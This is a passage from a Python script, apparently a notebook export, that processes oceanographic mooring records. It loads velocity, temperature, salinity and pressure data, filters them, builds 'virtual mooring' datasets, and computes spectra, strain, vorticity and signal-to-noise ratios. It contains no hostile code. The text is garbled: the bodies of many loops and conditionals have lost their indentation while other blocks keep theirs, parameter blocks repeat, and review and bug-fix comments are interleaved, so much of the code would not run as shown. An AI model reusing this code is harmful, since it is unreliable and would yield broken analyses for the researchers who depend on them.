# the integration limits.
fhi = 1.0
flo = 1.0
flov = 1.0 # When integrating spectra involved in vertical fluxes, get rid of
# the near inertial portion.
# When bandpass filtering windowed data use these params multiplied by f and N
filtlo = 0.9 # times f
filthi = 1.1 # times N
# Interpolation distance that raises flag (m)
zimax = 100.0
dt_sec = dt_min * 60.0 # Sample period in seconds.
dt_day = dt_sec / 86400.0 # Sample period in days.
N_per_day = int(1.0 / dt_day) # Samples per day.
# %% ############### PROCESS RAW DATA #########################################
print("RAW DATA")
###############################################################################
# Load w data for cc mooring and chop from text files. I checked and all the
# data has the same start date and the same length
# Read Nortek vertical-velocity (w) records for the central mooring. Each
# text file holds one instrument; line 4 of its header gives the depth.
print("Loading vertical velocity data from text files.")
nortek_files = glob.glob(os.path.join(data_in, "cc_1_*.txt"))
depth = []
for file in nortek_files:
    with open(file, "r") as f:
        content = f.readlines()
    # Header line looks like "... = <depth> ..." — take the numeric field.
    depth.append(int(content[3].split("=")[1].split()[0]))
idxs = np.argsort(depth)
# 42573 samples per file, 12 instruments — presumably a fixed record length;
# TODO confirm every file really has this many rows.
w = np.empty((42573, 12))
datenum = np.empty((42573, 12))
# NOTE(review): iterating "for i in idxs" while also writing to column i
# stores each file back in its original column, so the depth sort has no
# effect on column order — confirm whether depth-sorted columns were meant.
for i in idxs:
    YY, MM, DD, hh, W = np.genfromtxt(
        nortek_files[i], skip_header=12, usecols=(0, 1, 2, 3, 8), unpack=True
    )
    YY = YY.astype(int)
    MM = MM.astype(int)
    DD = DD.astype(int)
    mm = (60 * (hh % 1)).astype(int)  # fractional hour -> whole minutes
    hh = np.floor(hh).astype(int)
    w[:, i] = W / 100  # cm/s -> m/s
    dates = []
    for j in range(len(YY)):
        dates.append(datetime.datetime(YY[j], MM[j], DD[j], hh[j], mm[j]))
    dates = np.asarray(dates)
    datenum[:, i] = utils.datetime_to_datenum(dates)
# Chop to the common analysis window starting at t_start.
idx_start = np.searchsorted(datenum[:, 0], t_start)
w = w[idx_start : idx_start + max_len]
# Start prepping raw data from the mat file.
print("Loading raw data file.")
data_path = os.path.join(data_in, raw_data_file)
ds = utils.loadmat(data_path)
cc = ds.pop("c")
nw = ds.pop("nw")
ne = ds.pop("ne")
se = ds.pop("se")
sw = ds.pop("sw")
cc["id"] = "cc"
nw["id"] = "nw"
ne["id"] = "ne"
se["id"] = "se"
sw["id"] = "sw"
moorings = [cc, nw, ne, se, sw]
# Useful information
dt_min = 15.0 # Sample period in minutes.
dt_sec = dt_min * 60.0 # Sample period in seconds.
dt_day = dt_sec / 86400.0 # Sample period in days.
print("Chopping time series.")
for m in moorings:
m["idx_start"] = np.searchsorted(m["Dates"], t_start)
for m in moorings:
m["N_data"] = max_len
m["idx_end"] = m["idx_start"] + max_len
# Chop data to start and end dates.
varl = ["Dates", "Temp", "Sal", "u", "v", "Pres"]
for m in moorings:
for var in varl:
m[var] = m[var][m["idx_start"] : m["idx_end"], ...]
print("Renaming variables.")
print("Interpolating negative pressures.")
for m in moorings:
__, N_levels = m["Pres"].shape
m["N_levels"] = N_levels
# Tile time and pressure
m["t"] = np.tile(m.pop("Dates")[:, np.newaxis], (1, N_levels))
# Fix negative pressures by interpolating nearby data.
fix = m["Pres"] < 0.0
if fix.any():
levs = np.argwhere(np.any(fix, axis=0))[0]
for lev in levs:
x = m["t"][fix[:, lev], lev]
xp = m["t"][~fix[:, lev], lev]
fp = m["Pres"][~fix[:, lev], lev]
m["Pres"][fix[:, lev], lev] = np.interp(x, xp, fp)
# Rename variables
m["P"] = m.pop("Pres")
m["u"] = m["u"] / 100.0
m["v"] = m["v"] / 100.0
m["spd"] = np.sqrt(m["u"] ** 2 + m["v"] ** 2)
m["angle"] = np.angle(m["u"] + 1j * m["v"])
m["Sal"][(m["Sal"] < 33.5) | (m["Sal"] > 34.9)] = np.nan
m["S"] = m.pop("Sal")
m["Temp"][m["Temp"] < -2.0] = np.nan
m["T"] = m.pop("Temp")
# Dimensional quantities.
m["f"] = gsw.f(m["lat"])
m["ll"] = np.array([m["lon"], m["lat"]])
m["z"] = gsw.z_from_p(m["P"], m["lat"])
# Estimate thermodynamic quantities.
m["SA"] = gsw.SA_from_SP(m["S"], m["P"], m["lon"], m["lat"])
m["CT"] = gsw.CT_from_t(m["SA"], m["T"], m["P"])
# specvol_anom = gsw.specvol_anom(m['SA'], m['CT'], m['P'])
# m['sva'] = specvol_anom
cc["wr"] = w
print("Calculating thermodynamics.")
print("Excluding bad data using T-S funnel.")
# Chuck out data outside of TS funnel sensible range.
# The funnel is a closed polygon in (SA, CT) space read from funnel.txt;
# samples falling outside it are treated as bad and patched by linear
# interpolation in time, level by level.
funnel = np.genfromtxt("funnel.txt")
for m in moorings:
    S = m["SA"].flatten()
    T = m["CT"].flatten()
    p = path.Path(funnel)
    in_funnel = p.contains_points(np.vstack((S, T)).T)
    fix = np.reshape(~in_funnel, m["SA"].shape)
    m["in_funnel"] = ~fix  # keep a mask of the samples judged good
    varl = ["S"]  # only practical salinity is patched; T is left alone
    if fix.any():
        # NOTE(review): np.squeeze yields a 0-d array when exactly one level
        # is flagged, which would break this iteration — confirm that case
        # cannot occur in practice.
        levs = np.squeeze(np.argwhere(np.any(fix, axis=0)))
        for lev in levs:
            # Interpolate over the flagged times using the good samples.
            x = m["t"][fix[:, lev], lev]
            xp = m["t"][~fix[:, lev], lev]
            for var in varl:
                fp = m[var][~fix[:, lev], lev]
                m[var][fix[:, lev], lev] = np.interp(x, xp, fp)
    # Re-estimate thermodynamic quantities.
    m["SA"] = gsw.SA_from_SP(m["S"], m["P"], m["lon"], m["lat"])
    m["CT"] = gsw.CT_from_t(m["SA"], m["T"], m["P"])
print("Calculating neutral density.")
# Estimate the neutral density
for m in moorings:
# Compute potential temperature using the 1983 UNESCO EOS.
m["PT0"] = seawater.ptmp(m["S"], m["T"], m["P"])
# Flatten variables for analysis.
lons = m["lon"] * np.ones_like(m["P"])
lats = m["lat"] * np.ones_like(m["P"])
S_ = m["S"].flatten()
T_ = m["PT0"].flatten()
P_ = m["P"].flatten()
LO_ = lons.flatten()
LA_ = lats.flatten()
gamman = gamma_GP_from_SP_pt(S_, T_, P_, LO_, LA_)
m["gamman"] = np.reshape(gamman, m["P"].shape) + 1000.0
print("Calculating slice gradients at C.")
# Want gradient of density/vel to be local, no large central differences.
slices = [slice(0, 4), slice(4, 6), slice(6, 10), slice(10, 12)]
cc["dgdz"] = np.empty((cc["N_data"], cc["N_levels"]))
cc["dTdz"] = np.empty((cc["N_data"], cc["N_levels"]))
cc["dudz"] = np.empty((cc["N_data"], cc["N_levels"]))
cc["dvdz"] = np.empty((cc["N_data"], cc["N_levels"]))
for sl in slices:
z = cc["z"][:, sl]
g = cc["gamman"][:, sl]
T = cc["T"][:, sl]
u = cc["u"][:, sl]
v = cc["v"][:, sl]
cc["dgdz"][:, sl] = np.gradient(g, axis=1) / np.gradient(z, axis=1)
cc["dTdz"][:, sl] = np.gradient(T, axis=1) / np.gradient(z, axis=1)
cc["dudz"][:, sl] = np.gradient(u, axis=1) / np.gradient(z, axis=1)
cc["dvdz"][:, sl] = np.gradient(v, axis=1) / np.gradient(z, axis=1)
print("Filtering data.")
# Low pass filter data.
tc = tc_hrs * 60.0 * 60.0
fc = 1.0 / tc # Cut off frequency.
normal_cutoff = fc * dt_sec * 2.0 # Nyquist frequency is half 1/dt.
b, a = sig.butter(4, normal_cutoff, btype="lowpass")
varl = [
    "z",
    "P",
    "S",
    "T",
    "u",
    "v",
    "wr",
    "SA",
    "CT",
    "gamman",
    "dgdz",
    "dTdz",
    "dudz",
    "dvdz",
]  # sva
# For every mooring and variable: record the time mean ("_m"), then split
# the series into a low-passed component ("_lo", 4th-order Butterworth with
# cutoff tc_hrs, applied forward-backward via filtfilt) and the
# high-frequency residual ("_hi").
for m in moorings:
    for var in varl:
        try:
            data = m[var].copy()
        except KeyError:
            continue  # e.g. "wr" exists only at the central mooring
        m[var + "_m"] = np.nanmean(data, axis=0)
        # For the purpose of filtering set fill with 0 rather than nan (SW)
        nans = np.isnan(data)
        if nans.any():
            data[nans] = 0.0
        datalo = sig.filtfilt(b, a, data, axis=0)
        # Then put nans back...
        if nans.any():
            datalo[nans] = np.nan
        namelo = var + "_lo"
        m[namelo] = datalo
        namehi = var + "_hi"
        m[namehi] = m[var] - m[namelo]
    # Speed and direction of the filtered components. np.angle is used for
    # consistency with the unfiltered case earlier in the script (ma.angle
    # gave the same result here since the inputs are plain ndarrays).
    m["spd_lo"] = np.sqrt(m["u_lo"] ** 2 + m["v_lo"] ** 2)
    m["angle_lo"] = np.angle(m["u_lo"] + 1j * m["v_lo"])
    m["spd_hi"] = np.sqrt(m["u_hi"] ** 2 + m["v_hi"] ** 2)
    m["angle_hi"] = np.angle(m["u_hi"] + 1j * m["v_hi"])
# %% [markdown]
# Save the raw data.
# %% ##################### SAVE RAW DATA ######################################
io.savemat(os.path.join(data_out, "C_raw.mat"), cc)
io.savemat(os.path.join(data_out, "NW_raw.mat"), nw)
io.savemat(os.path.join(data_out, "NE_raw.mat"), ne)
io.savemat(os.path.join(data_out, "SE_raw.mat"), se)
io.savemat(os.path.join(data_out, "SW_raw.mat"), sw)
# %% [markdown]
# ## Create virtual mooring 'raw'.
# %%
print("VIRTUAL MOORING")
print("Determine maximum knockdown as a function of z.")
# Fit a quadratic of maximum mooring knockdown (min-minus-max vertical
# excursion) against instrument depth, excluding the SE mooring.
zms = np.hstack([m["z"].max(axis=0) for m in moorings if "se" not in m["id"]])
Dzs = np.hstack(
    [m["z"].min(axis=0) - m["z"].max(axis=0) for m in moorings if "se" not in m["id"]]
)
zmax_pfit = np.polyfit(zms, Dzs, 2)  # Second order polynomial for max knockdown
# Save the already-computed coefficients (previously np.polyfit was
# redundantly recomputed inside the save call).
np.save(os.path.join(data_out, "zmax_pfit"), zmax_pfit, allow_pickle=False)
# Define the knockdown model:
print("Load model data.")
mluv = xr.load_dataset("../data/mooring_locations_uv1.nc")
mluv = mluv.isel(
t=slice(0, np.argwhere(mluv.u[:, 0, 0].data == 0)[0][0])
) # Get rid of end zeros...
mluv = mluv.assign_coords(lon=mluv.lon)
mluv = mluv.assign_coords(id=["cc", "nw", "ne", "se", "sw"])
mluv["spd"] = (mluv.u ** 2 + mluv.v ** 2) ** 0.5
print("Create virtual mooring 'raw' dataset.")
savedict = {
"cc": {"id": "cc"},
"nw": {"id": "nw"},
"ne": {"id": "ne"},
"se": {"id": "se"},
"sw": {"id": "sw"},
}
mids = ["cc", "nw", "ne", "se", "sw"]
for idx, mid in enumerate(mids):
savedict[mid]["lon"] = mluv.lon[idx].data
savedict[mid]["lat"] = mluv.lat[idx].data
izs = []
for i in range(moorings[idx]["N_levels"]):
izs.append(nearidx(mluv.z, moorings[idx]["z"][:, i].max()))
spdm = mluv.spd.isel(z=izs, index=idx).mean(dim="z")
spdn = spdm / spdm.max()
zmax = mluv.z[izs]
zk = zmodel(spdn.data[:, np.newaxis], zmax.data[np.newaxis, :], zmax_pfit)
savedict[mid]["z"] = zk
savedict[mid]["t"] = np.tile(
mluv.t.data[:, np.newaxis], (1, moorings[idx]["N_levels"])
)
fu = itpl.RectBivariateSpline(mluv.t.data, -mluv.z.data, mluv.u[..., idx].data)
fv = itpl.RectBivariateSpline(mluv.t.data, -mluv.z.data, mluv.v[..., idx].data)
uk = fu(mluv.t.data[:, np.newaxis], -zk, grid=False)
vk = fv(mluv.t.data[:, np.newaxis], -zk, grid=False)
savedict[mid]["u"] = uk
savedict[mid]["v"] = vk
io.savemat("../data/virtual_mooring_raw.mat", savedict)
# %% [markdown]
# ## Create virtual mooring 'interpolated'.
# %%
# Corrected levels.
# heights = [-540., -1250., -2100., -3500.]
# Filter cut off (hours)
tc_hrs = 40.0
# Start of time series (matlab datetime)
# t_start = 734494.0
# Length of time series
# max_len = N_data = 42048
# Sampling period (minutes)
dt_min = 60.0
dt_sec = dt_min * 60.0 # Sample period in seconds.
dt_day = dt_sec / 86400.0 # Sample period in days.
N_per_day = int(1.0 / dt_day) # Samples per day.
# Window length for wave stress quantities and mesoscale strain quantities.
nperseg = 2 ** 7
# Spectra parameters
window = "hanning"
detrend = "constant"
# Extrapolation/interpolation limit above which data will be removed.
dzlim = 100.0
# Integration of spectra parameters. These multiple N and f respectively to set
# the integration limits.
fhi = 1.0
flo = 1.0
flov = 1.0 # When integrating spectra involved in vertical fluxes, get rid of
# the near inertial portion.
# %%
moorings = utils.loadmat("../data/virtual_mooring_raw.mat")
cc = moorings.pop("cc")
nw = moorings.pop("nw")
ne = moorings.pop("ne")
se = moorings.pop("se")
sw = moorings.pop("sw")
moorings = [cc, nw, ne, se, sw]
N_data = cc["t"].shape[0]
# %% [markdown]
# Polynomial fits first.
# %%
print("**Generating corrected data**")
# Generate corrected moorings
z = np.concatenate([m["z"].flatten() for m in moorings])
u = np.concatenate([m["u"].flatten() for m in moorings])
v = np.concatenate([m["v"].flatten() for m in moorings])
print("Calculating polynomial coefficients.")
pzu = np.polyfit(z, u, 2)
pzv = np.polyfit(z, v, 2)
# %%
# Additional height in m to add to interpolation height.
hoffset = [-25.0, 50.0, -50.0, 100.0]
pi2 = np.pi * 2.0
nfft = nperseg
levis = [(0, 1, 2, 3), (4, 5), (6, 7, 8, 9), (10, 11)]
Nclevels = len(levis)
spec_kwargs = {
"fs": 1.0 / dt_sec,
"window": window,
"nperseg": nperseg,
"nfft": nfft,
"detrend": detrend,
"axis": 0,
}
idx1 = np.arange(nperseg, N_data, nperseg // 2) # Window end index
idx0 = idx1 - nperseg # Window start index
N_windows = len(idx0)
# Initialise the place holder dictionaries.
c12w = {"N_levels": 12} # Dictionary for raw, windowed data from central mooring
c4w = {"N_levels": Nclevels} # Dictionary for processed, windowed data
c4 = {"N_levels": Nclevels} # Dictionary for processed data
# Dictionaries for raw, windowed data from outer moorings
nw5w, ne5w, se5w, sw5w = {"id": "nw"}, {"id": "ne"}, {"id": "se"}, {"id": "sw"}
moorings5w = [nw5w, ne5w, se5w, sw5w]
# Dictionaries for processed, windowed data from outer moorings
nw4w, ne4w, se4w, sw4w = {"id": "nw"}, {"id": "ne"}, {"id": "se"}, {"id": "sw"}
moorings4w = [nw4w, ne4w, se4w, sw4w]
# Initialised the arrays of windowed data
varr = ["t", "z", "u", "v"]
for var in varr:
c12w[var] = np.zeros((nperseg, N_windows, 12))
var4 = [
"t",
"z",
"u",
"v",
"dudx",
"dvdx",
"dudy",
"dvdy",
"dudz",
"dvdz",
"nstrain",
"sstrain",
"vort",
"div",
]
for var in var4:
c4w[var] = np.zeros((nperseg, N_windows, Nclevels))
for var in var4:
c4[var] = np.zeros((N_windows, Nclevels))
# Initialised the arrays of windowed data for outer mooring
varro = ["z", "u", "v"]
for var in varro:
for m5w in moorings5w:
m5w[var] = np.zeros((nperseg, N_windows, 5))
var4o = ["z", "u", "v"]
for var in var4o:
for m4w in moorings4w:
m4w[var] = np.zeros((nperseg, N_windows, Nclevels))
# for var in var4o:
# for m4 in moorings4:
# m4[var] = np.zeros((N_windows, 4))
# Window the raw data.
for i in range(N_windows):
idx = idx0[i]
for var in varr:
c12w[var][:, i, :] = cc[var][idx : idx + nperseg, :]
for i in range(N_windows):
idx = idx0[i]
for var in varro:
for m5w, m in zip(moorings5w, moorings[1:]):
m5w[var][:, i, :] = m[var][idx : idx + nperseg, :]
print("Interpolating properties.")
# Do the interpolation
for i in range(Nclevels):
# THIS hoffset is important!!!
c4["z"][:, i] = np.mean(c12w["z"][..., levis[i]], axis=(0, -1)) + hoffset[i]
for j in range(N_windows):
zr = c12w["z"][:, j, levis[i]]
ur = c12w["u"][:, j, levis[i]]
vr = c12w["v"][:, j, levis[i]]
zi = c4["z"][j, i]
c4w["z"][:, j, i] = np.mean(zr, axis=-1)
c4w["t"][:, j, i] = c12w["t"][:, j, 0]
c4w["u"][:, j, i] = moo.interp_quantity(zr, ur, zi, pzu)
c4w["v"][:, j, i] = moo.interp_quantity(zr, vr, zi, pzv)
dudzr = np.gradient(ur, axis=-1) / np.gradient(zr, axis=-1)
dvdzr = np.gradient(vr, axis=-1) / np.gradient(zr, axis=-1)
# Instead of mean, could moo.interp1d
c4w["dudz"][:, j, i] = np.mean(dudzr, axis=-1)
c4w["dvdz"][:, j, i] = np.mean(dvdzr, axis=-1)
for m5w, m4w in zip(moorings5w, moorings4w):
zr = m5w["z"][:, j, :]
ur = m5w["u"][:, j, :]
vr = m5w["v"][:, j, :]
m4w["z"][:, j, i] = np.full((nperseg), zi)
m4w["u"][:, j, i] = moo.interp_quantity(zr, ur, zi, pzu)
m4w["v"][:, j, i] = moo.interp_quantity(zr, vr, zi, pzv)
print("Filtering windowed data.")
fcorcpd = np.abs(gsw.f(cc["lat"])) * 86400 / pi2
varl = ["u", "v"]
for var in varl:
c4w[var + "_lo"] = utils.butter_filter(
c4w[var], 24 / tc_hrs, fs=N_per_day, btype="low", axis=0
)
c4w[var + "_hi"] = c4w[var] - c4w[var + "_lo"]
varl = ["u", "v"]
for var in varl:
for m4w in moorings4w:
m4w[var + "_lo"] = utils.butter_filter(
m4w[var], 24 / tc_hrs, fs=N_per_day, btype="low", axis=0
)
m4w[var + "_hi"] = m4w[var] - m4w[var + "_lo"]
c4w["zi"] = np.ones_like(c4w["z"]) * c4["z"]
print("Calculating horizontal gradients.")
# Calculate horizontal gradients
for j in range(N_windows):
ll = np.stack(
([m["lon"] for m in moorings[1:]], [m["lat"] for m in moorings[1:]]), axis=1
)
uv = np.stack(
(
[m4w["u_lo"][:, j, :] for m4w in moorings4w],
[m4w["v_lo"][:, j, :] for m4w in moorings4w],
),
axis=1,
)
dudx, dudy, dvdx, dvdy, vort, div = moo.div_vort_4D(ll[:, 0], ll[:, 1], uv)
nstrain = dudx - dvdy
sstrain = dvdx + dudy
c4w["dudx"][:, j, :] = dudx
c4w["dudy"][:, j, :] = dudy
c4w["dvdx"][:, j, :] = dvdx
c4w["dvdy"][:, j, :] = dvdy
c4w["nstrain"][:, j, :] = nstrain
c4w["sstrain"][:, j, :] = sstrain
c4w["vort"][:, j, :] = vort
c4w["div"][:, j, :] = div
for var in var4:
if var == "z": # Keep z as modified by hoffset.
continue
c4[var] = np.mean(c4w[var], axis=0)
freq, c4w["Puu"] = sig.welch(c4w["u_hi"], **spec_kwargs)
_, c4w["Pvv"] = sig.welch(c4w["v_hi"], **spec_kwargs)
_, c4w["Cuv"] = sig.csd(c4w["u_hi"], c4w["v_hi"], **spec_kwargs)
c4w["freq"] = freq.copy()
# Get rid of annoying tiny values.
svarl = ["Puu", "Pvv", "Cuv"]
for var in svarl:
    c4w[var][0, ...] = 0.0
    # Use Nclevels (currently 4) instead of a hard-coded 4 so the array
    # shape tracks the number of interpolation levels.
    c4[var + "_int"] = np.full((N_windows, Nclevels), np.nan)
# Horizontal azimuth according to Jing 2018
c4w["theta"] = np.arctan2(2.0 * c4w["Cuv"].real, (c4w["Puu"] - c4w["Pvv"])) / 2
# Integration #############################################################
print("Integrating power spectra.")
for var in svarl:
c4w[var + "_cint"] = np.full_like(c4w[var], fill_value=np.nan)
fcor = np.abs(gsw.f(cc["lat"])) / pi2
N_freq = len(freq)
freq_ = np.tile(freq[:, np.newaxis, np.newaxis], (1, N_windows, Nclevels))
# ulim = fhi * np.tile(c4["N"][np.newaxis, ...], (N_freq, 1, 1)) / pi2
ulim = 1e9 # Set a huge upper limit since we don't know what N is...
llim = fcor * flo
use = (freq_ < ulim) & (freq_ > llim)
svarl = ["Puu", "Pvv", "Cuv"]
for var in svarl:
c4[var + "_int"] = igr.simps(use * c4w[var].real, freq, axis=0)
c4w[var + "_cint"] = igr.cumtrapz(use * c4w[var].real, freq, axis=0, initial=0.0)
# Change lower integration limits for vertical components...
llim = fcor * flov
use = (freq_ < ulim) & (freq_ > llim)
# Usefull quantities
c4["nstress"] = c4["Puu_int"] - c4["Pvv_int"]
c4["sstress"] = -2.0 * c4["Cuv_int"]
c4["F_horiz"] = (
-0.5 * (c4["Puu_int"] - c4["Pvv_int"]) * c4["nstrain"]
- c4["Cuv_int"] * c4["sstrain"]
)
# ## Now we have to create the model 'truth'...
#
# Load the model data and estimate some gradients.
print("Estimating smoothed gradients (slow).")
mluv = xr.load_dataset("../data/mooring_locations_uv1.nc")
mluv = mluv.isel(
t=slice(0, np.argwhere(mluv.u[:, 0, 0].data == 0)[0][0])
) # Get rid of end zeros...
mluv = mluv.assign_coords(lon=mluv.lon)
mluv = mluv.assign_coords(id=["cc", "nw", "ne", "se", "sw"])
mluv["dudz"] = (["t", "z", "index"], np.gradient(mluv.u, mluv.z, axis=1))
mluv["dvdz"] = (["t", "z", "index"], np.gradient(mluv.v, mluv.z, axis=1))
uv = np.rollaxis(np.stack((mluv.u, mluv.v))[..., 1:], 3, 0)
dudx, dudy, dvdx, dvdy, vort, div = moo.div_vort_4D(mluv.lon[1:], mluv.lat[1:], uv)
nstrain = dudx - dvdy
sstrain = dvdx + dudy
mluv["dudx"] = (["t", "z"], dudx)
mluv["dudy"] = (["t", "z"], dudy)
mluv["dvdx"] = (["t", "z"], dvdx)
mluv["dvdy"] = (["t", "z"], dvdy)
mluv["nstrain"] = (["t", "z"], nstrain)
mluv["sstrain"] = (["t", "z"], sstrain)
mluv["vort"] = (["t", "z"], vort)
mluv["div"] = (["t", "z"], div)
# Smooth the model data in an equivalent way to the real mooring.
dudxs = (
mluv.dudx.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
dvdxs = (
mluv.dvdx.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
dudys = (
mluv.dudy.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
dvdys = (
mluv.dvdy.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
sstrains = (
mluv.sstrain.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
nstrains = (
mluv.nstrain.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
divs = (
mluv.div.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
vorts = (
mluv.vort.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
dudzs = (
mluv.dudz.isel(index=0)
.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
dvdzs = (
mluv.dvdz.isel(index=0)
.rolling(t=nperseg, center=True)
.reduce(np.average, weights=sig.hann(nperseg))
.dropna("t")
)
# Make spline fits.
fdudx = itpl.RectBivariateSpline(dudxs.t.data, -dudxs.z.data, dudxs.data)
fdvdx = itpl.RectBivariateSpline(dvdxs.t.data, -dvdxs.z.data, dvdxs.data)
fdudy = itpl.RectBivariateSpline(dudys.t.data, -dudys.z.data, dudys.data)
fdvdy = itpl.RectBivariateSpline(dvdys.t.data, -dvdys.z.data, dvdys.data)
fsstrain = itpl.RectBivariateSpline(sstrains.t.data, -sstrains.z.data, sstrains.data)
fnstrain = itpl.RectBivariateSpline(nstrains.t.data, -nstrains.z.data, nstrains.data)
fdiv = itpl.RectBivariateSpline(divs.t.data, -divs.z.data, divs.data)
fvort = itpl.RectBivariateSpline(vorts.t.data, -vorts.z.data, vorts.data)
fdudz = itpl.RectBivariateSpline(dudzs.t.data, -dudzs.z.data, dudzs.data)
fdvdz = itpl.RectBivariateSpline(dvdzs.t.data, -dvdzs.z.data, dvdzs.data)
# Interpolate using splines.
dudxt = fdudx(c4["t"], -c4["z"], grid=False)
dvdxt = fdvdx(c4["t"], -c4["z"], grid=False)
dudyt = fdudy(c4["t"], -c4["z"], grid=False)
dvdyt = fdvdy(c4["t"], -c4["z"], grid=False)
sstraint = fsstrain(c4["t"], -c4["z"], grid=False)
nstraint = fnstrain(c4["t"], -c4["z"], grid=False)
divt = fdiv(c4["t"], -c4["z"], grid=False)
vortt = fvort(c4["t"], -c4["z"], grid=False)
dudzt = fdudz(c4["t"], -c4["z"], grid=False)
dvdzt = fdvdz(c4["t"], -c4["z"], grid=False)
c4["dudxt"] = dudxt
c4["dvdxt"] = dvdxt
c4["dudyt"] = dudyt
c4["dvdyt"] = dvdyt
c4["sstraint"] = sstraint
c4["nstraint"] = nstraint
c4["divt"] = divt
c4["vortt"] = vortt
c4["dudzt"] = dudzt
c4["dvdzt"] = dvdzt
# %%
# %% ########################## SAVE CORRECTED FILES ##########################
io.savemat("../data/virtual_mooring_interpolated.mat", c4)
io.savemat("../data/virtual_mooring_interpolated_windowed.mat", c4w)
# %% [markdown]
# Signal to noise ratios.
# %%
print("Estimating signal to noise ratios.")
M = munch.munchify(utils.loadmat('../data/virtual_mooring_interpolated.mat'))
# Signal-to-noise ratio = variance of the mooring-derived quantity divided
# by the variance of its error relative to the model truth (suffix "t").
# shear strain
dsstrain = M.sstrain - M.sstraint
SNR_sstrain = M.sstrain.var(axis=0)/dsstrain.var(axis=0)
np.save('../data/SNR_sstrain', SNR_sstrain, allow_pickle=False)
# normal strain
dnstrain = M.nstrain - M.nstraint
SNR_nstrain = M.nstrain.var(axis=0)/dnstrain.var(axis=0)
np.save('../data/SNR_nstrain', SNR_nstrain, allow_pickle=False)
# zonal shear
ddudz = M.dudz - M.dudzt
# BUG FIX: the numerator previously used M.dvdz (meridional shear); the
# zonal-shear SNR must use the zonal-shear variance.
SNR_dudz = M.dudz.var(axis=0)/ddudz.var(axis=0)
np.save('../data/SNR_dudz', SNR_dudz, allow_pickle=False)
# meridional shear
ddvdz = M.dvdz - M.dvdzt
SNR_dvdz = M.dvdz.var(axis=0)/ddvdz.var(axis=0)
np.save('../data/SNR_dvdz', SNR_dvdz, allow_pickle=False)
# divergence
ddiv = M.div - M.divt
# Use a dedicated name (previously this clobbered SNR_nstrain).
SNR_div = M.div.var(axis=0)/ddiv.var(axis=0)
np.save('../data/SNR_div', SNR_div, allow_pickle=False)
# %% [markdown]
# <a id="corrected"></a>
# %% [markdown]
# ## Generate interpolated data.
#
# Set parameters again.
# %%
# Corrected levels.
# heights = [-540., -1250., -2100., -3500.]
# Filter cut off (hours)
tc_hrs = 40.0
# Start of time series (matlab datetime)
t_start = 734494.0
# Length of time series
max_len = N_data = 42048
# Data file
raw_data_file = "moorings.mat"
# Index where NaNs start in u and v data from SW mooring
sw_vel_nans = 14027
# Sampling period (minutes)
dt_min = 15.0
# Window length for wave stress quantities and mesoscale strain quantities.
nperseg = 2 ** 9
# Spectra parameters
window = "hanning"
detrend = "constant"
# Extrapolation/interpolation limit above which data will be removed.
dzlim = 100.0
# Integration of spectra parameters. These multiple N and f respectively to set
# the integration limits.
fhi = 1.0
flo = 1.0
flov = 1.0 # When integrating spectra involved in vertical fluxes, get rid of
# the near inertial portion.
# When bandpass filtering windowed data use these params multiplied by f and N
filtlo = 0.9 # times f
filthi = 1.1 # times N
# Interpolation distance that raises flag (m)
zimax = 100.0
dt_sec = dt_min * 60.0 # Sample period in seconds.
dt_day = dt_sec / 86400.0 # Sample period in days.
N_per_day = int(1.0 / dt_day) # Samples per day.
# %% [markdown]
# Polynomial fits first.
# %%
print("REAL MOORING INTERPOLATION")
print("**Generating corrected data**")
moorings = load_data.load_my_data()
cc, nw, ne, se, sw = moorings
# Generate corrected moorings
T = np.concatenate([m["T"].flatten() for m in moorings])
S = np.concatenate([m["S"].flatten() for m in moorings])
z = np.concatenate([m["z"].flatten() for m in moorings])
u = np.concatenate([m["u"].flatten() for m in moorings])
v = np.concatenate([m["v"].flatten() for m in moorings])
g = np.concatenate([m["gamman"].flatten() for m in moorings])
# SW problems...
nans = np.isnan(u) | np.isnan(v)
print("Calculating polynomial coefficients.")
pzT = np.polyfit(z[~nans], T[~nans], 3)
pzS = np.polyfit(z[~nans], S[~nans], 3)
pzg = np.polyfit(z[~nans], g[~nans], 3)
pzu = np.polyfit(z[~nans], u[~nans], 2)
pzv = np.polyfit(z[~nans], v[~nans], 2)
# %%
# Additional height in m to add to interpolation height.
hoffset = [-25.0, 50.0, -50.0, 100.0]
pi2 = np.pi * 2.0
nfft = nperseg
levis = [(0, 1, 2, 3), (4, 5), (6, 7, 8, 9), (10, 11)]
Nclevels = len(levis)
spec_kwargs = {
"fs": 1.0 / dt_sec,
"window": window,
"nperseg": nperseg,
"nfft": nfft,
"detrend": detrend,
"axis": 0,
}
idx1 = np.arange(nperseg, N_data, nperseg // 2) # Window end index
idx0 = idx1 - nperseg # Window start index
N_windows = len(idx0)
# Initialise the place holder dictionaries.
c12w = {"N_levels": 12} # Dictionary for raw, windowed data from central mooring
c4w = {"N_levels": Nclevels} # Dictionary for processed, windowed data
c4 = {"N_levels": Nclevels} # Dictionary for processed data
# Dictionaries for raw, windowed data from outer moorings
nw5w, ne5w, se5w, sw5w = {"id": "nw"}, {"id": "ne"}, {"id": "se"}, {"id": "sw"}
moorings5w = [nw5w, ne5w, se5w, sw5w]
# Dictionaries for processed, windowed data from outer moorings
nw4w, ne4w, se4w, sw4w = {"id": "nw"}, {"id": "ne"}, {"id": "se"}, {"id": "sw"}
moorings4w = [nw4w, ne4w, se4w, sw4w]
# Initialised the arrays of windowed data
varr = ["t", "z", "u", "v", "gamman", "S", "T", "P"]
for var in varr:
c12w[var] = np.zeros((nperseg, N_windows, cc["N_levels"]))
var4 = [
"t",
"z",
"u",
"v",
"gamman",
"dudx",
"dvdx",
"dudy",
"dvdy",
"dudz",
"dvdz",
"dgdz",
"nstrain",
"sstrain",
"vort",
"N2",
]
for var in var4:
c4w[var] = np.zeros((nperseg, N_windows, Nclevels))
for var in var4:
c4[var] = np.zeros((N_windows, Nclevels))
